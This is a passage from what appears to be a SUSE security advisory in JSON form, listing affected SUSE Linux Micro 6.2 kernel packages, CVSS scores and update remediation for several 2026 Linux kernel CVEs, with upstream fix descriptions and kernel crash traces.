"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23002",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23002"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib/buildid: use __kernel_read() for sleepable context\n\nPrevent a \"BUG: unable to handle kernel NULL pointer dereference in\nfilemap_read_folio\".\n\nFor the sleepable context, convert freader to use __kernel_read() instead\nof direct page cache access via read_cache_folio(). This simplifies the\nfaultable code path by using the standard kernel file reading interface\nwhich handles all the complexity of reading file data.\n\nAt the moment we are not changing the code for non-sleepable context which\nuses filemap_get_folio() and only succeeds if the target folios are\nalready in memory and up-to-date. The reason is to keep the patch simple\nand easier to backport to stable kernels.\n\nSyzbot repro does not crash the kernel anymore and the selftests run\nsuccessfully.\n\nIn the follow up we will make __kernel_read() with IOCB_NOWAIT work for\nnon-sleepable contexts. In addition, I would like to replace the\nsecretmem check with a more generic approach and will add fstest for the\nbuildid code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23002",
"url": "https://www.suse.com/security/cve/CVE-2026-23002"
},
{
"category": "external",
"summary": "SUSE Bug 1257243 for CVE-2026-23002",
"url": "https://bugzilla.suse.com/1257243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23002"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
